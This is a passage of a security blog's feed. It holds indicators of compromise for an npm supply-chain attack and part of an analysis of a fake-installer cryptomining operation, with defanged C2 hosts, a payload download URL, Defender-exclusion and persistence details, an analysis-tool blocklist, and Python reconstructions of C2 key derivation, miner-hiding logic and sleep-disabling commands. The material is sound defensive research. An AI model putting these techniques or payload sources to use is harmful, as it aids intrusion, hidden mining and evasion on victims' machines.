<p>The macOS backdoor facilitates:</p>
<ul>
<li>C2 connection by passing a URL directly as an argument.</li>
<li>AppleScript execution using <code>osascript</code> via temporary hidden <code>.scpt</code> files dropped to <code>/tmp/</code>.</li>
<li>Filesystem enumeration targeting <code>/Applications</code> and <code>~/Library/Application Support</code>.</li>
<li>Downloading and executing remote base64-encoded payloads.</li>
<li>Ad-hoc code signing of dropped payloads (<code>codesign --force --deep --sign - "/private/tmp/.*"</code>) so they can run past Gatekeeper.</li>
</ul>
<p>The binary is not packed or obfuscated, ships with debug entitlements enabled, retains developer build paths (<code>Jain_DEV/client_mac/macWebT</code>), and uses a spoofed IE8/Windows XP user-agent string (<code>mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)</code>).</p>
<p>These detections collectively follow the macOS delivery path from staged AppleScript execution to payload launch and post-execution behavior:</p>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/command_and_control_suspicious_url_as_argument_to_self_signed_binary.toml">Suspicious URL as argument to Self-Signed Binary</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/defense_evasion_potential_binary_masquerading_via_invalid_code_signature.toml#L8">Potential Binary Masquerading via Invalid Code Signature</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/execution_suspicious_xpc_service_child_process.toml#L5">Suspicious XPC Service Child Process</a></li>
</ul>
<h2>Conclusion</h2>
<p>This supply chain attack highlights how little complexity is required to achieve cross-platform compromise when execution is triggered during installation.</p>
<p>Across Linux, Windows, and macOS, we consistently observed the same core pattern: a Node.js process spawning native OS execution to retrieve and launch a remote payload, followed by immediate detachment or hidden execution.</p>
<p>From a detection perspective, the key takeaway is that the most reliable signals are not in the package itself, but in what happens immediately after installation. Process ancestry, network retrieval, and detached execution provide a stable detection surface that remains effective even when payloads, filenames, or infrastructure change.</p>
<p>Elastic detections focused on this behavior provided consistent coverage of the delivery stage across all platforms, without relying on static indicators.</p>
<h2>Indicators of Compromise (IOCs)</h2>
<h3>Related Alerts</h3>
<table>
<thead>
<tr>
<th align="left">Alert</th>
<th align="left">Operating System</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml">Curl or Wget Spawned via</a> <a href="http://Node.js">Node.js</a></td>
<td align="left">Linux</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/linux/execution_process_backgrounded_by_unusual_parent.toml">Process Backgrounded by Unusual Parent</a></td>
<td align="left">Linux</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/defense_evasion_execution_via_renamed_signed_binary_proxy.toml">Execution via Renamed Signed Binary Proxy</a></td>
<td align="left">Windows</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/windows/command_and_control_tool_transfer_via_curl.toml">Potential File Transfer via Curl for Windows</a></td>
<td align="left">Windows</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_startup_persistence_via_windows_script_interpreter.toml">Startup Persistence via Windows Script Interpreter</a></td>
<td align="left">Windows</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_suspicious_string_value_written_to_registry_run_key.toml">Suspicious String Value Written to Registry Run Key</a></td>
<td align="left">Windows</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/execution_suspicious_powershell_base64_decoding.toml">Suspicious PowerShell Base64 Decoding</a></td>
<td align="left">Windows</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/command_and_control_suspicious_url_as_argument_to_self_signed_binary.toml">Suspicious URL as argument to Self-Signed Binary</a></td>
<td align="left">macOS</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/defense_evasion_potential_binary_masquerading_via_invalid_code_signature.toml#L8">Potential Binary Masquerading via Invalid Code Signature</a></td>
<td align="left">macOS</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/execution_suspicious_xpc_service_child_process.toml#L5">Suspicious XPC Service Child Process</a></td>
<td align="left">macOS</td>
</tr>
</tbody>
</table>
<h3>Malicious Packages</h3>
<table>
<thead>
<tr>
<th>Package</th>
<th>Version</th>
<th>Hash (shasum)</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>axios</code></td>
<td><code>1.14.1</code></td>
<td><code>2553649f232204966871cea80a5d0d6adc700ca</code></td>
</tr>
<tr>
<td><code>axios</code></td>
<td><code>0.30.4</code></td>
<td><code>d6f3f62fd3b9f5432f5782b62d8cfd5247d5ee71</code></td>
</tr>
<tr>
<td><code>plain-crypto-js</code></td>
<td><code>4.2.1</code></td>
<td><code>07d889e2dadce6f3910dcbc253317d28ca61c766</code></td>
</tr>
</tbody>
</table>
<p>Additional related packages observed in the ecosystem abuse:</p>
<table>
<thead>
<tr>
<th>Package</th>
<th>Version</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>@shadanai/openclaw</code></td>
<td><code>2026.3.28-2</code>, <code>2026.3.28-3</code>, <code>2026.3.31-1</code>, <code>2026.3.31-2</code></td>
</tr>
<tr>
<td><code>@qqbrowser/openclaw-qbot</code></td>
<td><code>0.0.130</code></td>
</tr>
</tbody>
</table>
<h3>Script / Payload Hashes (SHA256)</h3>
<table>
<thead>
<tr>
<th>File</th>
<th>SHA256</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>setup.js</code></td>
<td><code>e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09</code></td>
</tr>
<tr>
<td><code>/tmp/ld.py</code></td>
<td><code>6483c004e207137385f480909d6edecf1b699087378aa91745ecba7c3394f9d7</code></td>
</tr>
<tr>
<td><code>6202033.ps1</code></td>
<td><code>ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c</code></td>
</tr>
<tr>
<td><code>system.bat</code></td>
<td><code>e49c2732fb9861548208a78e72996b9c3c470b6b562576924bcc3a9fb75bf9ff</code></td>
</tr>
<tr>
<td><code>com.apple.act.mond</code></td>
<td><code>92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a</code></td>
</tr>
</tbody>
</table>
<h3>Network Indicators</h3>
<table>
<thead>
<tr>
<th>Type</th>
<th>Indicator</th>
</tr>
</thead>
<tbody>
<tr>
<td>C2 Domain</td>
<td><code>sfrclak[.]com</code></td>
</tr>
<tr>
<td>C2 IP</td>
<td><code>142.11.206[.]73</code></td>
</tr>
<tr>
<td>C2 URL</td>
<td><code>http://sfrclak[.]com:8000/6202033</code></td>
</tr>
<tr>
<td>User-Agent</td>
<td><code>mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)</code></td>
</tr>
<tr>
<td>macOS POST body</td>
<td><code>packages[.]npm[.]org/product0</code></td>
</tr>
<tr>
<td>Windows POST body</td>
<td><code>packages[.]npm[.]org/product1</code></td>
</tr>
<tr>
<td>Linux POST body</td>
<td><code>packages[.]npm[.]org/product2</code></td>
</tr>
</tbody>
</table>
<h3>File System Indicators</h3>
<h4>Cross-platform</h4>
<table>
<thead>
<tr>
<th>Path / Artifact</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>$TMPDIR/6202033</code></td>
<td>Temporary staging artifact</td>
</tr>
<tr>
<td><code>*/node_modules/plain-crypto-js/setup.js</code></td>
<td>Node.js first-stage dropper</td>
</tr>
</tbody>
</table>
<h4>Linux</h4>
<table>
<thead>
<tr>
<th>Path</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>/tmp/ld.py</code></td>
<td>Python RAT second stage</td>
</tr>
</tbody>
</table>
<h4>Windows</h4>
<table>
<thead>
<tr>
<th>Path</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>%PROGRAMDATA%\wt.exe</code></td>
<td>Renamed <code>powershell.exe</code> (execution proxy)</td>
</tr>
<tr>
<td><code>%PROGRAMDATA%\system.bat</code></td>
<td>Persistence launcher</td>
</tr>
<tr>
<td><code>HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate</code></td>
<td>Persistence key</td>
</tr>
<tr>
<td><code>%TEMP%\6202033.vbs</code></td>
<td>VBS launcher (self-deletes)</td>
</tr>
<tr>
<td><code>%TEMP%\6202033.ps1</code></td>
<td>PowerShell payload (self-deletes)</td>
</tr>
</tbody>
</table>
<h4>macOS</h4>
<table>
<thead>
<tr>
<th>Path</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>/Library/Caches/com.apple.act.mond</code></td>
<td>Mach-O backdoor payload</td>
</tr>
<tr>
<td><code>/tmp/*.scpt</code></td>
<td>Temporary AppleScript launcher</td>
</tr>
</tbody>
</table>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/axios-supply-chain-compromise-detections.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Fake Installers to Monero: A Multi-Tool Mining Operation]]></title>
            <link>https://www.elastic.co/security-labs/fake-installers-to-monero</link>
            <guid>fake-installers-to-monero</guid>
            <pubDate>Tue, 31 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security Labs dissects a long-running operation deploying RATs, cryptominers, and CPA fraud through fake installer lures, tracking its evolution across campaigns and Monero payouts.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>Elastic Security Labs has been tracking a financially motivated operation, designated REF1695, that has been active since at least late 2023. The operator deploys a combination of RATs, cryptominers, and custom XMRig loaders through fake installer packages. Across all observed campaigns, the infection chains share a consistent packing technique, overlapping C2 infrastructure, and common social engineering patterns, linking them to a single operator.</p>
<p>Beyond cryptomining, the threat actor monetizes infections through CPA (Cost Per Action) fraud, directing victims to content locker pages under the guise of software registration. In this report, we trace the operation's evolution across multiple campaign builds, analyze the C2 communication protocols, document a previously unreported .NET implant (CNB Bot), and track the operator's financial returns via public Monero mining pool dashboards.</p>
<h3>Key takeaways</h3>
<ul>
<li>Financially motivated campaigns have been active since late 2023, deploying various RATs and cryptominers through fake installer packages.</li>
<li>Operator monetizes infections through both cryptomining and CPABuild fraud.</li>
<li>Stages use a consistent Themida/WinLicense + .NET Reactor packing combination.</li>
<li>CNB Bot is a previously undocumented .NET implant with RSA-2048 signed task authentication.</li>
<li>A custom XMRig loader evades detection by killing the miner whenever analysis tools are running, and deploys WinRing0x64.sys.</li>
<li>Over 27.88 XMR has been paid out across four tracked wallets, with active workers at the time of writing.</li>
<li>We leveraged a Claude-driven agentic pipeline to automate the extraction of payload stages and implant configurations.</li>
</ul>
<h2>Campaign 1 (CNB Bot)</h2>
<p>The most recent campaign involves dropping CNB Bot, using an ISO file as the infection vector. The ISO image contains two files: a single-stage .NET Reactor-protected loader further packed with Themida/WinLicense 3.x, and a ReadMe.txt. Associated ISO samples:</p>
<ul>
<li><code>460203070b5a928390b126fcd52c15ed3a668b77536faa6f0a0282cf1c157162</code></li>
<li><code>b8b7aecce2a4d00f209b1e4d30128ba6ef0f83bbdc05127f6f8ba97e7d6df291</code></li>
<li><code>9977b9185472c7d4be22c20f93bc401dd74bb47223957015a3261994d54c59fc</code></li>
<li><code>9fa23382820b1e781f3e05e9452176a72529395643f09080777fab7b9c6b1f5c</code></li>
<li><code>27db41f654b53e41a4e1621a83f2478fa46b1bbffc1923e5070440a7d410b8d3</code></li>
</ul>
<p>The ReadMe.txt serves as a social engineering lure, framing the unsigned binary as the product of a small non-profit team that cannot afford EV code signing, then provides explicit instructions to bypass SmartScreen via <code>&quot;More Info&quot; → &quot;Run Anyway&quot;</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image4.png" alt="ReadMe.txt lure" title="ReadMe.txt lure" /></p>
<p>Using the open-source Themida/WinLicense unpacker project, <a href="https://github.com/ergrelet/unlicense">Unlicense</a>, we automatically extracted the .NET Reactor-protected loader and then passed it through <a href="https://github.com/SychicBoy/NETReactorSlayer">NETReactorSlayer</a> for deobfuscation. The majority of campaigns were observed to use this combination of protection in both the initial and subsequent stages.</p>
<p>The loader first invokes PowerShell with <code>-WindowStyle Hidden</code> to register broad Microsoft Defender exclusions via <code>Add-MpPreference -ExclusionPath</code> and <code>Add-MpPreference -ExclusionProcess</code>, covering the loader itself, staging directories (<code>%TEMP%</code>, <code>%LocalAppData%</code>, <code>%AppData%</code>), and a set of LOLBin process names the malware later utilizes.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image10.png" alt="Setting up Microsoft Defender exclusions" title="Setting up Microsoft Defender exclusions" /></p>
<p>It then extracts an embedded .NET assembly resource and writes it to disk at <code>%TEMP%\MLPCInstallHelper.exe</code> (filename varies by build), then executes it via PowerShell. This embedded resource is a .NET Reactor-protected CNB Bot instance, discussed in detail in the <strong>Code Analysis - CNB Bot</strong> section below.</p>
<p>Since no legitimate software is installed at any point, the loader presents a fake error dialog to the user, attributing the installation failure to unmet system requirements.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image13.png" alt="Fake error dialog" title="Fake error dialog" /></p>
<h2>Campaign 2 (PureRAT)</h2>
<p>Pivoting on the ReadMe.txt lure content, we discovered a campaign dropping PureRAT v3.0.1. This campaign uses an initial-stage loader very similar to Campaign 1's and introduces a second-stage loader.</p>
<p>Example ISO samples employing this chain:</p>
<ul>
<li><code>7bb0e91558244bcc79b6d7a4fe9d9882f11d3a99b70e1527aac979e27165f1d7</code></li>
<li><code>c6c4a9725653b585a9d65fc90698d4610579b289bcfb2539f7a5f7e64e69f2e4</code></li>
<li><code>a3f84aa1d15fd33506157c61368fd602d0b81f69aff6c69249bf833d217308bb</code></li>
<li><code>82c03866670b70047209c39153615512f7253f125a252fe3dcd828c6598fdf86</code></li>
<li><code>542d2267b40c160b693646bc852df34cc508281c4f6ed2693b98147dae293678</code></li>
</ul>
<p>We will be using the first sample from this list as an example for our analysis.</p>
<p>The initial-stage loader applies Microsoft Defender exclusions to the same directory set (<code>%TEMP%</code>, loader path, <code>%LocalAppData%</code>, …), but process exclusions are limited to the loader executable only. The Stage 2 payload is extracted from the embedded resource to <code>%TEMP%\&lt;...&gt;InstallHelper.exe</code> and launched via hidden PowerShell <code>Start-Process</code>. Stage 2 is protected with the same Themida + .NET Reactor packing technique.</p>
<p>Stage 2 registers only process-level Microsoft Defender exclusions.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image22.png" alt="Setting up Microsoft Defender exclusions" title="Setting up Microsoft Defender exclusions" /></p>
<p>The loader then extracts four embedded resources into the install directory at <code>%SystemDrive%\Users\%UserName%\AppData\Local\SVCData\Config</code>, dropping three unused, benign DLLs and a malicious <code>svchost.exe</code> binary, which is the third stage. Stage 3 is launched through PowerShell, and a scheduled task named <code>SVCConfig</code> is registered via <code>schtasks.exe</code> with an <code>ONLOGON</code> trigger and <code>HIGHEST</code> run level.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image33.png" alt="Stage 3 installation" title="Stage 3 installation" /></p>
<p>Following payload launch, Stage 2 writes a temporary .bat file to <code>%TEMP%</code> with a polling loop that forcefully deletes the installer binary until successful, then deletes the batch file itself.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image38.png" alt="Self-delete installer binary" title="Self-delete installer binary" /></p>
<p>Stage 3 is a Themida + .NET Reactor-protected, in-memory PE loader, which is also the beginning of the PureRAT component. The encrypted next-stage module is stored as a .NET resource and decrypted via Triple DES (3DES) in CBC mode using an embedded key and IV. The decrypted output is a GZip-compressed PE: the first 4 bytes encode the decompressed size as a little-endian integer, followed by the GZip stream.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image3.png" alt="PureRAT next-stage decryption" title="PureRAT next-stage decryption" /></p>
<p>The PureRAT v3.0.1 configuration is decoded by base64-decoding an embedded string and deserializing the result as a Protobuf message:</p>
<ul>
<li><code>23-01-26</code> (build / campaign date)</li>
<li><code>windirautoupdates[.]top</code> (C2 #1)</li>
<li><code>winautordr.itemdb[.]com</code> (C2 #2)</li>
<li><code>winautordr.ydns[.]eu</code> (C2 #3)</li>
<li><code>winautordr.kozow[.]com</code>  (C2 #4)</li>
<li><code>Aesthetics135</code> (mutex and C2 comms key)</li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image17.png" alt="PureRAT decoded configuration" title="PureRAT decoded configuration" /></p>
<p>The C2 communication protocol uses a key derivation function, <code>PBKDF2-SHA1(&quot;Aesthetics135&quot;, embedded_salt=010217EA2530863FF804, iter=5000)</code>, to derive 96 bytes of key material, split into an AES-256-CBC key and an HMAC-SHA256 key. Incoming messages are authenticated by verifying the HMAC stored in the first 32 bytes over <code>[IV | ciphertext]</code>; the IV is then read from bytes 32-48 and used to decrypt the remaining ciphertext, yielding a <a href="https://protobuf.dev/">Protobuf</a>-encoded command message.</p>
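<p>The derivation and authentication steps can be reproduced with the Python standard library. The 32/64-byte split of the derived material is our assumption (the analysis states only that the 96 bytes are split into the two keys), and the AES-CBC decryption is left as a comment since it requires a third-party library:</p>

```python
import hashlib
import hmac

COMMS_KEY = b"Aesthetics135"                     # per-campaign comms key
SALT = bytes.fromhex("010217EA2530863FF804")     # embedded salt

def derive_keys():
    """PBKDF2-SHA1(key, salt, 5000 iterations) -> 96 bytes of material.
    The 32/64 split (AES-256 key, then HMAC key) is an assumption."""
    material = hashlib.pbkdf2_hmac("sha1", COMMS_KEY, SALT, 5000, dklen=96)
    return material[:32], material[32:]

def verify_and_split(message: bytes):
    """Check the leading HMAC-SHA256 tag over [IV | ciphertext], then
    return (iv, ciphertext) ready for AES-256-CBC decryption."""
    _, hmac_key = derive_keys()
    tag, iv, ct = message[:32], message[32:48], message[48:]
    expected = hmac.new(hmac_key, iv + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("HMAC verification failed")
    # AES-256-CBC decryption of `ct` with `iv` would follow here,
    # e.g. via the third-party `cryptography` package.
    return iv, ct
```

The same routine works in reverse for building decryptors against captured PureRAT traffic.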
<p>By decrypting traffic captured in VirusTotal sandboxes, we observed that the C2 server at <code>windirautoupdates[.]top</code> was automatically issuing a download-and-execute task directing the implant to fetch an XMR mining payload from <code>https://github[.]com/lebnabar198/Hgh5gM99fe3dG/raw/refs/heads/main/MnrsInstllr_240126[.]exe</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image24.png" alt="PureRAT initial task decryption" title="PureRAT initial task decryption" /></p>
<h2>Campaign 3 (PureRAT, PureMiner, XMRig loader)</h2>
<p>The third campaign variant shares the same initial-stage loader design as Campaigns 1 and 2. Its Stage 2 resembles Campaign 2 but differs by dropping multiple embedded payloads from the resource section, including PureRAT, a custom XMRig loader, and PureMiner.</p>
<p>Example ISO sample:</p>
<ul>
<li><code>f84b00fc75f183c571c8f49fcc1d7e0241f538025db0f2daa4e2c5b9a6739049</code>.</li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image40.png" alt="Installation of PureRAT, PureMiner, and a custom XMRig loader" title="Installation of PureRAT, PureMiner, and a custom XMRig loader" /></p>
<p>To keep the machine awake and maximize mining uptime, the loader disables sleep and hibernation via Windows power management commands:</p>
<ul>
<li><code>powercfg /change standby-timeout-ac 0</code></li>
<li><code>powercfg /change standby-timeout-dc 0</code></li>
<li><code>powercfg /change hibernate-timeout-ac 0</code></li>
<li><code>powercfg /change hibernate-timeout-dc 0</code></li>
</ul>
<p>The PureRAT configuration matches Campaign 2, differing only in the build/campaign ID: <code>25-11-25</code>.</p>
<p>The PE loader component of PureMiner is similar to PureRAT, and the decrypted module is also obfuscated via .NET Reactor. Since the configuration is Protobuf-serialized, hooking <code>ProtoBuf.Serializer::Deserialize</code> allows inspection of the configuration data:</p>
<ul>
<li><code>25-11-25</code> (build / campaign date)</li>
<li><code>wndlogon.hopto[.]org</code> (C2 #1)</li>
<li><code>wndlogon.itemdb[.]com</code> (C2 #2)</li>
<li><code>wndlogon.ydns[.]eu</code> (C2 #3)</li>
<li><code>wndlogon.kozow[.]com</code> (C2 #4)</li>
<li><code>4c271ad41ea2f6a44ce8d0</code> (mutex and C2 comms key)</li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image41.png" alt="PureMiner decoded configuration" title="PureMiner decoded configuration" /></p>
<p>Additional behavioral indicators include the dynamic loading of AMD Display Library binaries (<code>atiadlxx.dll</code>/<code>atiadlxy.dll</code>) and the NVIDIA API library (<code>nvapi64.dll</code>), consistent with GPU hardware profiling techniques employed by PureMiner.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image1.png" alt="PureMiner loading atiadlxx.dll, atiadlxy.dll, and nvapi64.dll" title="PureMiner loading atiadlxx.dll, atiadlxy.dll, and nvapi64.dll" /></p>
<h3>Custom .NET-Based Loader for XMRig</h3>
<p>The following findings cover the custom XMRig loader deployed during this campaign. Analyzed samples:</p>
<ul>
<li><code>0176ffaf278b9281aa207c59b858c8c0b6e38fdb13141f7ed391c9f8b2dc7630</code></li>
<li><code>9409f9c398645ddac096e3331d2782705b62e388a8ecb1c4e9d527616f0c6a9e</code></li>
<li><code>f84b00fc75f183c571c8f49fcc1d7e0241f538025db0f2daa4e2c5b9a6739049</code></li>
</ul>
<h4>The Entry Point and Setup</h4>
<p>Execution begins in the <code>Start()</code> method. The loader first calls <code>FetchRemoteConfig()</code>, which reaches out to a hardcoded URL (<code>https://autoupdatewinsystem[.]top/MyMNRconfigs/0226.txt</code>). The response is AES-encrypted JSON, which the loader decrypts using a hardcoded key (<code>AsyncPrivateInputx64</code>) and parses to extract the pool, wallet, and mining arguments. If the remote server is unreachable or decryption fails, it falls back to a hardcoded <code>ztbpVbABSx1jDIKnWGbx1d_0</code> configuration to ensure mining can still occur.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image26.png" alt="The hard-coded configuration when the online config is unavailable" title="The hard-coded configuration when the online config is unavailable" /></p>
<h4>Resource Extraction</h4>
<p>Simultaneously, an asynchronous task triggers <code>ExtractResources()</code>. The loader checks the <code>%TEMP%</code> directory for two files: <code>procsrv.exe</code> (the renamed XMRig payload) and <code>WinRing0x64.sys</code> (a driver used by XMRig for direct hardware access). If either is absent, the loader unpacks them from its own assembly manifest.</p>
<h4>Evasion Loop</h4>
<p>After a 3-second sleep, the loader calls <code>StartEvasionTimer()</code>, initializing a timer that ticks every 1,000 milliseconds. On each tick, <code>IsAnalysisToolRunning()</code> compares all running process names against a hardcoded list of 35 security and monitoring tools (<code>Taskmgr</code>, <code>ProcessHacker</code>, <code>Wireshark</code>, <code>Procmon</code>, etc.).</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image34.png" alt="Monitoring tools that are targeted" title="Monitoring tools that are targeted" /></p>
<p>If any analysis tool is detected, the loader immediately calls <code>KillMinerProcess()</code>, terminating <code>procsrv.exe</code>, effectively dropping the CPU usage back to normal.</p>
<p>If no analysis tool is detected, the loader calls <code>CheckAndRunMiner()</code>. If the miner is not currently running, it reconstructs the command-line arguments (using the remote or fallback config) and quietly launches the miner as a hidden background process via <code>LaunchMiner()</code>.</p>
<p>This creates a &quot;hide and seek&quot; scenario for the victim. Whenever they try to investigate why their PC is slow, the malware shuts down the miner.</p>
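<p>The per-tick logic of the evasion timer can be modeled as follows. Process enumeration and the kill/launch actions are abstracted into callbacks, and the tool list is a short excerpt of the 35 hardcoded names:</p>

```python
# Excerpt of the loader's hardcoded analysis-tool blocklist.
ANALYSIS_TOOLS = {"taskmgr", "processhacker", "wireshark", "procmon"}

def tick(running_processes, kill_miner, launch_miner, miner_running):
    """One iteration of the 1,000 ms evasion timer: kill the miner if
    any analysis tool is visible, otherwise (re)launch it when it is
    not already running."""
    names = {p.lower() for p in running_processes}
    if names & ANALYSIS_TOOLS:
        kill_miner()
    elif not miner_running:
        launch_miner()
```

Modeling the loop this way makes the detection implication clear: CPU load drops the instant a listed tool appears, so passive telemetry (not interactive tooling) is needed to observe the miner.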
<h4>WinRing0x64.sys and Ring 0 Access</h4>
<p>The loader also drops and loads <code>WinRing0x64.sys</code>, a legitimate open-source driver frequently abused by cryptominers. The driver provides direct Ring 0 (kernel-level) hardware access, which XMRig uses to apply its Model Specific Register (MSR) modification, reconfiguring CPU prefetcher and L3 cache behavior to significantly boost RandomX (Monero) hash rates.</p>
<h2>Campaign 4 - Umnr_ (SilentCryptoMiner)</h2>
<p>From the <code>autoupdatewinsystem[.]top</code> domain, we identified another GitHub account <code>https://github[.]com/ugurlutaha6116</code> hosting another loader variant whose executable name is prefixed with <code>Umnr_</code>. This Themida-packed SilentCryptoMiner loader establishes persistence on the victim machine, injects a watchdog payload into <code>conhost.exe</code> and a miner payload into <code>explorer.exe</code>, and mines ETH or XMR depending on the build configuration.</p>
<p>SilentCryptoMiner is a closed-source Win32 64-bit malware released for free on <a href="https://github.com/Unam-Sanctam/SilentCryptoMiner">GitHub</a>. The samples we analyzed are older versions than the latest <a href="https://github.com/Unam-Sanctam/SilentCryptoMiner/releases">release</a>:</p>
<ul>
<li><code>1f7441d72eff2e9403be1d9ce0bb07792793b2cb963f2601ecfdf8c91cd9af73</code></li>
<li><code>468441d32f62520020d57ff1f24bb08af1bc10e9b4d4da1b937450f44e80a9be</code></li>
<li><code>4e6b8fdd819293ca3fe8f8add6937bf6531a936955d9ac974a6b231823c7330e</code></li>
<li><code>6492e50e79b979254314988228a513d5acbdaa950346414955dc052ae77d2988</code></li>
<li><code>ce90cb3a9bfb8a276cb50462be932e063ed408af8c5591dd2c50f1c6d18c394c</code></li>
</ul>
<h4>Direct Syscalls</h4>
<p>To evade detection, SilentCryptoMiner uses direct syscalls instead of <code>NTDLL</code> functions. To do this, it parses <code>NTDLL</code> exports to locate the target function by a hash of its name, extracts the syscall number, and manually executes the syscall instruction sequence.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image36.png" alt="Direct syscall procedure" title="Direct syscall procedure" /></p>
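<p>The resolution step can be illustrated as follows. This is a hedged sketch: the sample's actual hash algorithm is not reproduced here (a djb2-style hash stands in for it), and the stub layout shown is the standard x64 <code>Nt*</code> prologue:</p>

```python
def name_hash(name):
    # Illustrative djb2-style hash over an export name;
    # the sample's real algorithm may differ.
    h = 5381
    for b in name:
        h = (h * 33 + b) % 2**32
    return h

def syscall_number(stub):
    # Clean x64 Nt* stubs begin with:
    #   4C 8B D1    mov r10, rcx
    #   B8 imm32    mov eax, <syscall number>
    if stub[:4] != b"\x4c\x8b\xd1\xb8":
        raise ValueError("unexpected stub prologue (possibly hooked)")
    return int.from_bytes(stub[4:8], "little")
```

<p>With the extracted number, the malware executes its own <code>syscall</code> instruction rather than calling through the potentially hooked <code>NTDLL</code> export.</p>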
<h4>Disable Sleep and Hibernate</h4>
<p>To ensure it can use the host machine for as long as possible, SilentCryptoMiner disables Windows sleep and hibernation by executing a shell command.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image5.png" alt="Disable windows sleep and hibernate" title="Disable windows sleep and hibernate" /></p>
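<p>A typical way to achieve this is via <code>powercfg</code>. The sketch below is a hedged reconstruction: the sample's literal command line appears only in the screenshot above, so these are the standard equivalents:</p>

```python
import subprocess

# Standard powercfg invocations that disable sleep/hibernate on AC power;
# hedged reconstruction, not the sample's literal command line.
COMMANDS = [
    ["powercfg", "/change", "standby-timeout-ac", "0"],
    ["powercfg", "/change", "hibernate-timeout-ac", "0"],
    ["powercfg", "/hibernate", "off"],
]

def disable_power_saving(run=subprocess.run):
    for cmd in COMMANDS:
        run(cmd, check=False)  # failures are silently ignored, as malware typically does
```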
<h4>Install Persistence</h4>
<p>After copying itself to its installation folder (in this case, configured to masquerade as legitimate software named “<code>Appdata/Local/OptimizeMS/optims.exe</code>”), SilentCryptoMiner proceeds to establish persistence. If the process is running with administrator privileges, it creates a scheduled task configured via an XML file.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image8.png" alt="Schtask task creation for persistence" title="Schtask task creation for persistence" /></p>
<p>The XML file is dropped onto the disk in the <code>AppData/Local/Temp</code> folder and contains the task configuration. One interesting setting is <code>AllowHardTerminate = False</code>, which prevents the Task Scheduler service from forcibly terminating the task.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image14.png" alt="Malware XML task configuration" title="Malware XML task configuration" /></p>
